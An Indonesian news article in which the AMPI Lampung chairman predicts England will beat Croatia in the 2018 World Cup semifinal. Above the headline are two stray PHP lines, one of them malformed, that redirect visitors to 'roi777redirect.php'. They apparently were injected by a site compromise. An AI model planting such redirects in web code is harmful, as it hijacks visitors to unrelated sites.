header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Ketua AMPI Lampung Jagokan Inggris -
Ketua AMPI Lampung Jagokan Inggris

TRANSLAMPUNG.COM, BANDARJAYA – Ketua AMPI Lampung, Ardito Wijaya lebih menjagokan Inggris pada laga semifinal Piala Dunia 2018 melawan Kroasia, Kamis (12/7) pukul 01.00 WIB dinihari.

“Saya lebih mengungulkan Inggris karena dua hal itu. Materi dan faktor sejarah. Materi lebih baik dan jarang terjadi kejutan pada saat sudah masuk fase semifinal,” kata Ardito saat ditanya prediksi pertandingan semifinal kedua tersebut, Rabu (11/7/2018).

Selain itu, kata dia, Inggris memiliki harga tranfer lebih tinggi dari Kroasia. “Memang dalam pertandingan apapun bisa terjadi. Tetapi kesempatan tentu lebih besar team dengan materi yang lebih baik,” ujarnya.

Menurut dia, dari sejarah tahun 2006 hingga 2014 Piala Dunia yang dia ingat, baru sekali di semifinal terjadi kejutan team yang tidak diunggulkan berhasil meraih kemenang.

Yaitu piala dunia 2014. Di mana saat itu Jerman berhasil mengalahkan tuan rumah Brasil dengan skor telak, 7-1. “Padahal pada saat itu materi Brasil lebih baik dan Brasil menjadi tuan rumah Piala Dunia. Lima pertandingan lainnya dimenangkan team yang lebih diunggulkan,” katanya. (rid)

News Reporter